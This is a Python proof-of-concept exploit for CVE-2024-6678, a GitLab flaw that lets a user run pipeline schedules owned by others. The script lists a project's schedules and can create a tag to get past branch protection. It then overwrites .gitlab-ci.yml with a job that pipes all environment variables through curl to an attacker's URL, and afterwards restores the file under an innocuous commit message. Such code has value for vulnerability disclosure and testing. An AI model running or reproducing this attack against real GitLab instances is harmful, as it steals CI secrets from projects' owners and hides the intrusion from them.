README.md
Rendering markdown...
#!/usr/bin/env python3
# FaLLenSkiLL
import argparse
import json
import sys
import time
import urllib.request
import urllib.error
import urllib.parse
# ---------------------------------------------------------------------------
# HTTP helpers (no third-party deps)
# ---------------------------------------------------------------------------
def api_request(base_url: str, path: str, token: str,
method: str = "GET", data: dict | None = None,
quiet: bool = False) -> dict:
url = f"{base_url.rstrip('/')}/api/v4{path}"
headers = {
"PRIVATE-TOKEN": token,
"Content-Type": "application/json",
"Accept": "application/json",
}
body = json.dumps(data).encode() if data else None
req = urllib.request.Request(url, data=body, headers=headers, method=method)
try:
with urllib.request.urlopen(req) as resp:
raw = resp.read()
return json.loads(raw) if raw else {}
except urllib.error.HTTPError as e:
body = e.read().decode(errors="replace")
if not quiet:
print(f" [!] HTTP {e.code} on {method} {url}: {body[:200]}")
return {"_error": e.code, "_body": body}
except urllib.error.URLError as e:
print(f" [!] Network error: {e.reason}")
sys.exit(1)
def graphql_request(base_url: str, token: str, query: str,
variables: dict | None = None) -> dict:
url = f"{base_url.rstrip('/')}/api/graphql"
payload = {"query": query}
if variables:
payload["variables"] = variables
data = json.dumps(payload).encode()
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json",
}
req = urllib.request.Request(url, data=data, headers=headers, method="POST")
try:
with urllib.request.urlopen(req) as resp:
return json.loads(resp.read())
except urllib.error.HTTPError as e:
body = e.read().decode(errors="replace")
print(f" [!] GraphQL HTTP {e.code}: {body[:300]}")
return {}
# ---------------------------------------------------------------------------
# Reconnaissance
# ---------------------------------------------------------------------------
def get_current_user(base_url: str, token: str) -> dict:
return api_request(base_url, "/user", token)
def list_schedules(base_url: str, token: str, project_id: int) -> list:
"""List all pipeline schedules visible to the attacker."""
schedules = []
page = 1
while True:
batch = api_request(
base_url,
f"/projects/{project_id}/pipeline_schedules?per_page=100&page={page}",
token,
)
if "_error" in batch or not isinstance(batch, list) or not batch:
break
schedules.extend(batch)
page += 1
return schedules
def get_schedule_details(base_url: str, token: str,
project_id: int, schedule_id: int) -> dict:
"""Fetch full schedule details (variables only visible to owner/admin)."""
return api_request(
base_url,
f"/projects/{project_id}/pipeline_schedules/{schedule_id}",
token,
)
# ---------------------------------------------------------------------------
# Exploitation — REST API path
# ---------------------------------------------------------------------------
def play_schedule_rest(base_url: str, token: str,
project_id: int, schedule_id: int) -> dict:
"""
Trigger the pipeline schedule via the REST API.
Vulnerable path:
POST /api/v4/projects/:id/pipeline_schedules/:sid/play
→ RunPipelineScheduleWorker.perform_async(schedule.id, current_user.id)
The pipeline is queued as *current_user*, not as the schedule owner.
"""
return api_request(
base_url,
f"/projects/{project_id}/pipeline_schedules/{schedule_id}/play",
token,
method="POST",
quiet=True,
)
# ---------------------------------------------------------------------------
# Exploitation — GraphQL path
# ---------------------------------------------------------------------------
GRAPHQL_PLAY_MUTATION = """
mutation triggerSchedule($id: CiPipelineScheduleID!) {
pipelineSchedulePlay(input: { id: $id }) {
pipelineSchedule {
id
owner { username }
nextRunAt
}
errors
}
}
"""
def play_schedule_graphql(base_url: str, token: str,
project_path: str, schedule_gid: str) -> dict:
"""
Alternative vector via GraphQL mutation (Mutations::Ci::PipelineSchedule::Play).
Uses Ci::PipelineScheduleService → schedule.schedule_next_run! then
RunPipelineScheduleWorker.perform_async(schedule.id, current_user&.id).
"""
return graphql_request(
base_url, token, GRAPHQL_PLAY_MUTATION,
variables={"id": schedule_gid},
)
# ---------------------------------------------------------------------------
# Exploitation — Protected-ref bypass (legacy short-ref + ambiguous tag)
# ---------------------------------------------------------------------------
def check_legacy_ref_bypass(base_url: str, token: str,
project_id: int, schedules: list) -> list:
"""
Identify schedules potentially affected by the legacy ref bypass.
Vulnerable schedules are those whose ref does NOT start with 'refs/heads/'
or 'refs/tags/' (i.e., short/legacy refs). For such schedules, the policy
checks ProtectedBranch via:
is_tag = project.repository.tag_exists?(ref)
ref_name = ref
ref_protected?(user, project, is_tag, ref_name)
If a tag named <ref> exists and is NOT protected (but the branch IS), the
protected_ref condition evaluates FALSE and play_pipeline_schedule is
granted to developers — bypassing branch protection.
See: app/policies/ci/pipeline_schedule_policy.rb, condition(:protected_ref)
"""
vulnerable = []
for s in schedules:
ref = s.get("ref", "")
if not ref.startswith("refs/heads/") and not ref.startswith("refs/tags/"):
vulnerable.append(s)
print(f" [+] Legacy ref schedule found: id={s['id']} ref='{ref}' "
f"owner={s.get('owner', {}).get('username', '?')}")
return vulnerable
def create_bypass_tag(base_url: str, token: str,
project_id: int, ref_name: str) -> dict:
"""
Create a tag with the same name as a protected branch to trigger the
ambiguous-ref code path in the legacy branch of protected_ref condition.
Requires: Developer access (can create tags on unprotected refs).
"""
return api_request(
base_url,
f"/projects/{project_id}/repository/tags",
token,
method="POST",
data={"tag_name": ref_name, "ref": "HEAD"},
)
# ---------------------------------------------------------------------------
# Post-exploitation: CI yaml patch + exfiltration
# ---------------------------------------------------------------------------
def _exfil_yaml(exfil_url: str) -> str:
return (
"stages: [exfil]\n"
"dump_vars:\n"
" stage: exfil\n"
" script:\n"
f" - env | grep -vE '^(CI_JOB_TOKEN|GITLAB_FEATURES)' |"
f" curl -s -X POST '{exfil_url}' --data-binary @-\n"
)
def get_ci_yaml(base_url: str, token: str,
project_id: int, branch: str) -> tuple[str | None, str | None]:
"""Return (content, sha) of .gitlab-ci.yml, or (None, None) if missing."""
resp = api_request(
base_url,
f"/projects/{project_id}/repository/files/"
f".gitlab-ci.yml?ref={urllib.parse.quote(branch, safe='')}",
token,
quiet=True,
)
if "_error" in resp:
return None, None
import base64
content = base64.b64decode(resp.get("content", "")).decode(errors="replace")
return content, resp.get("last_commit_id")
def patch_ci_yaml(base_url: str, token: str,
project_id: int, branch: str, exfil_url: str) -> bool:
"""Overwrite .gitlab-ci.yml with exfil payload. Returns True on success."""
existing, _ = get_ci_yaml(base_url, token, project_id, branch)
action = "update" if existing is not None else "create"
resp = api_request(
base_url,
f"/projects/{project_id}/repository/files/.gitlab-ci.yml",
token,
method="PUT" if action == "update" else "POST",
data={
"branch": branch,
"content": _exfil_yaml(exfil_url),
"commit_message": "ci: update pipeline config",
},
quiet=True,
)
return "_error" not in resp
def restore_ci_yaml(base_url: str, token: str,
project_id: int, branch: str,
original: str | None) -> bool:
"""Restore .gitlab-ci.yml to original content (or delete if it didn't exist)."""
if original is None:
resp = api_request(
base_url,
f"/projects/{project_id}/repository/files/.gitlab-ci.yml",
token,
method="DELETE",
data={"branch": branch, "commit_message": "ci: revert pipeline config"},
quiet=True,
)
else:
resp = api_request(
base_url,
f"/projects/{project_id}/repository/files/.gitlab-ci.yml",
token,
method="PUT",
data={
"branch": branch,
"content": original,
"commit_message": "ci: revert pipeline config",
},
quiet=True,
)
return "_error" not in resp
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def parse_args() -> argparse.Namespace:
p = argparse.ArgumentParser(
description="CVE-2024-6678 PoC — GitLab pipeline schedule arbitrary trigger"
)
p.add_argument("--url", required=True,
help="Base GitLab URL, e.g. https://gitlab.example.com")
p.add_argument("--token", required=True,
help="Attacker's personal access token (Developer-level scope)")
p.add_argument("--project-id", required=True, type=int,
help="Target GitLab project numeric ID")
p.add_argument("--schedule-id", type=int, default=None,
help="Specific pipeline schedule ID to trigger (default: auto-select)")
p.add_argument("--exfil-url", default=None,
help="Webhook URL to receive leaked CI variable dump")
p.add_argument("--exploit-mode", action="store_true",
help="Attempt protected-ref bypass via legacy tag trick")
p.add_argument("--graphql", action="store_true",
help="Use GraphQL mutation instead of REST API")
p.add_argument("--project-path", default=None,
help="Project full path (required for --graphql), e.g. group/project")
return p.parse_args()
def banner():
print("""
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2024-6678 GitLab Pipeline Schedule Arbitrary Trigger ║
║ Affected: GitLab CE/EE 8.14 – 17.1.6 / 17.2.4 / 17.3.1 ║
║ Fixed in: 17.1.7 / 17.2.5 / 17.3.2 ║
╚═══════════════════════════════════════════════════════════════╝
""")
def print_impact(target_owner: str, attacker_username: str, target_ref: str,
visible_vars: list, via: str = "REST API") -> None:
ref_display = target_ref if len(target_ref) <= 43 else target_ref[:40] + "..."
vars_display = (f"{len(visible_vars)} var(s) visible + hidden vars"
if visible_vars else "hidden — still INJECTED at runtime")
print()
print(" ╔══════════════════════════════════════════════════════════════╗")
print(" ║ EXPLOIT SUCCEEDED ║")
print(" ╠══════════════════════════════════════════════════════════════╣")
print(f" ║ Vector : {via:<43}║")
print(f" ║ Schedule owner : {target_owner:<43}║")
print(f" ║ Triggered as : {attacker_username:<43}║")
print(f" ║ Ref : {ref_display:<43}║")
print(f" ║ Schedule vars : {vars_display:<43}║")
print(" ╚══════════════════════════════════════════════════════════════╝")
print()
def main():
banner()
args = parse_args()
base_url = args.url
token = args.token
project_id = args.project_id
# Step 1: Identify attacker
print("[*] Authenticating...")
me = get_current_user(base_url, token)
if "_error" in me:
print(" [!] Authentication failed. Check --token.")
sys.exit(1)
attacker_id = me["id"]
attacker_username = me["username"]
print(f" Attacker : {attacker_username} (id={attacker_id})")
# Step 2: Enumerate pipeline schedules
print(f"\n[*] Enumerating pipeline schedules for project {project_id}...")
schedules = list_schedules(base_url, token, project_id)
if not schedules:
print(" [!] No pipeline schedules found or access denied.")
sys.exit(1)
print(f" Found {len(schedules)} schedule(s):")
for s in schedules:
owner_name = s.get("owner", {}).get("username", "?") if s.get("owner") else "?"
status = "active" if s.get("active") else "inactive"
print(f" [{status}] id={s['id']:<5} owner={owner_name:<20}"
f" ref={s.get('ref','?'):<35} {s.get('description','')[:30]}")
# Step 3: Select target schedule
if args.schedule_id:
target_id = args.schedule_id
target = next((s for s in schedules if s["id"] == target_id), None)
if not target:
print(f" [!] Schedule {target_id} not found in the list above.")
sys.exit(1)
else:
# Prefer: owned by someone else, active, ref not a common protected default
_protected_defaults = {"refs/heads/main", "refs/heads/master",
"main", "master"}
candidates = [s for s in schedules
if s.get("owner", {}).get("id") != attacker_id
and s.get("active", False)]
if not candidates:
candidates = [s for s in schedules if s.get("active", False)]
if not candidates:
candidates = list(schedules)
# Sort: unprotected-looking refs first
candidates.sort(key=lambda s: s.get("ref", "") in _protected_defaults)
target = candidates[0]
print(f"\n Auto-selected: id={target['id']} "
f"(owner: {target.get('owner', {}).get('username', '?')},"
f" ref: {target.get('ref', '?')})")
target_id = target["id"]
target_owner = target.get("owner", {}).get("username", "?")
target_ref = target.get("ref", "?")
# Step 4: Check visible schedule variables
details = get_schedule_details(base_url, token, project_id, target_id)
visible_vars = details.get("variables", [])
if visible_vars:
print(f"\n [+] Schedule variables visible to attacker"
f" (normally owner/admin only):")
for v in visible_vars:
print(f" {v.get('key')} = {v.get('value', '<masked>')}")
else:
print(f"\n [i] Schedule variables hidden from attacker"
f" — will still be injected at pipeline runtime.")
# Step 5: Legacy-ref bypass
if args.exploit_mode:
print("\n[*] Checking for legacy short-ref schedules (protected-ref bypass)...")
legacy = check_legacy_ref_bypass(base_url, token, project_id, schedules)
if legacy:
s0 = legacy[0]
print(f" [+] Legacy-ref schedule found: id={s0['id']} ref='{s0['ref']}'")
print(f" [*] Creating ambiguous tag '{s0['ref']}' to trigger bypass...")
tag_result = create_bypass_tag(base_url, token, project_id, s0["ref"])
if "_error" not in tag_result:
print(f" [+] Tag created. protected_ref will now evaluate as"
f" unprotected tag, not branch.")
target = s0
target_id = target["id"]
else:
print(" [-] Tag creation failed (already exists or insufficient perms).")
else:
print(" [-] No legacy short-ref schedules found — bypass not applicable.")
# Step 6: CI yaml patch for auto-exfiltration
original_yaml: str | None = None
yaml_patched = False
exfil_branch = target_ref.removeprefix("refs/heads/") if target_ref.startswith("refs/heads/") else target_ref
if args.exfil_url:
print(f"\n[*] Patching .gitlab-ci.yml on '{exfil_branch}' with exfil payload...")
original_yaml, _ = get_ci_yaml(base_url, token, project_id, exfil_branch)
if patch_ci_yaml(base_url, token, project_id, exfil_branch, args.exfil_url):
yaml_patched = True
print(f" [+] Patched. Pipeline will POST all env vars to: {args.exfil_url}")
if original_yaml:
print(f" [i] Original .gitlab-ci.yml saved for restore.")
else:
print(f" [-] Failed to patch .gitlab-ci.yml (need push access to '{exfil_branch}').")
print(f" Continuing without auto-exfil.")
# Step 7: Trigger
via_graphql = args.graphql and args.project_path
print(f"\n[*] Triggering schedule id={target_id} (owner={target_owner})"
f" as {attacker_username}...")
exploit_ok = False
if via_graphql:
schedule_gid = f"gid://gitlab/Ci::PipelineSchedule/{target_id}"
result = play_schedule_graphql(base_url, token, args.project_path, schedule_gid)
errors = (result.get("data", {})
.get("pipelineSchedulePlay", {})
.get("errors", []))
if not errors:
exploit_ok = True
print_impact(target_owner, attacker_username, target_ref,
visible_vars, via="GraphQL mutation")
elif any("Unable to schedule" in e for e in errors):
exploit_ok = True
print_impact(target_owner, attacker_username, target_ref,
visible_vars, via="GraphQL mutation")
print(" [i] 'Unable to schedule' = Sidekiq deduplication:"
" job already queued from a prior successful trigger.")
else:
print(f" [!] GraphQL errors: {errors}")
else:
result = play_schedule_rest(base_url, token, project_id, target_id)
if "_error" not in result:
exploit_ok = True
print_impact(target_owner, attacker_username, target_ref,
visible_vars, via="REST API")
else:
code = result["_error"]
body = result.get("_body", "")
if code == 403:
print(" [!] HTTP 403 — access denied.")
print(" Likely cause: ref is protected, or attacker lacks"
" Developer access.")
elif code == 429:
print(" [!] HTTP 429 — rate limited. Wait ~1 minute and retry.")
elif code == 500 and "Unable to schedule" in body:
exploit_ok = True
print_impact(target_owner, attacker_username, target_ref,
visible_vars, via="REST API")
print(" [i] HTTP 500 'Unable to schedule' = Sidekiq deduplication:"
" job already queued from a prior successful trigger.")
else:
print(f" [!] HTTP {code}: {body[:200]}")
# Step 8: Wait for pipeline creation, then restore .gitlab-ci.yml
if exploit_ok:
if yaml_patched:
# Record the latest pipeline ID *before* triggering so we only
# accept pipelines created AFTER this exploit run.
pre_trigger = api_request(
base_url,
f"/projects/{project_id}/pipelines"
f"?source=schedule&ref={urllib.parse.quote(exfil_branch, safe='')}"
f"&per_page=1",
token, quiet=True,
)
latest_before = pre_trigger[0]["id"] if isinstance(pre_trigger, list) and pre_trigger else 0
print(f"\n[*] Waiting for pipeline to be created"
f" (Sidekiq must process the job)...")
poll_interval = 3
poll_timeout = 120
elapsed = 0
pipeline_found = None
while elapsed < poll_timeout:
time.sleep(poll_interval)
elapsed += poll_interval
pipelines = api_request(
base_url,
f"/projects/{project_id}/pipelines"
f"?source=schedule&ref={urllib.parse.quote(exfil_branch, safe='')}"
f"&per_page=5",
token,
quiet=True,
)
if isinstance(pipelines, list):
new = [p for p in pipelines if p["id"] > latest_before]
if new:
pipeline_found = new[0]
break
print(f" [.] {elapsed}s — pipeline not yet created, retrying...")
if pipeline_found:
triggered_by = pipeline_found.get("user", {}).get("username", "?")
print(f" [+] Pipeline id={pipeline_found['id']}"
f" status={pipeline_found['status']}"
f" triggered_by={triggered_by}")
else:
print(f" [-] Pipeline not created after {poll_timeout}s"
f" — Sidekiq may not be processing pipeline_creation queue.")
print(f"\n[*] Restoring original .gitlab-ci.yml on '{exfil_branch}'...")
if restore_ci_yaml(base_url, token, project_id, exfil_branch, original_yaml):
print(f" [+] Restored.")
else:
print(f" [-] Restore failed — manual cleanup needed on '{exfil_branch}'.")
if pipeline_found:
print(f"\n[i] Pipeline is executing with injected schedule variables.")
print(f" Variables will arrive at: {args.exfil_url}")
print(f" (use 'webhook.site' or 'nc -lvnp 8080' as listener)")
else:
# No yaml patch — just report pipelines if any
time.sleep(2)
pipelines = api_request(
base_url,
f"/projects/{project_id}/pipelines?source=schedule&per_page=3",
token,
quiet=True,
)
if isinstance(pipelines, list) and pipelines:
print("[*] Triggered pipelines (source=schedule):")
for p in pipelines[:3]:
triggered_by = p.get("user", {}).get("username", "?")
print(f" id={p['id']} status={p['status']:<10}"
f" ref={p.get('ref','?'):<25} triggered_by={triggered_by}")
sys.exit(0)
else:
if yaml_patched:
print(f"\n[*] Trigger failed — restoring .gitlab-ci.yml...")
restore_ci_yaml(base_url, token, project_id, exfil_branch, original_yaml)
print(f" [+] Restored.")
print("\n [-] EXPLOIT FAILED — pipeline was not triggered.\n")
sys.exit(1)
if __name__ == "__main__":
main()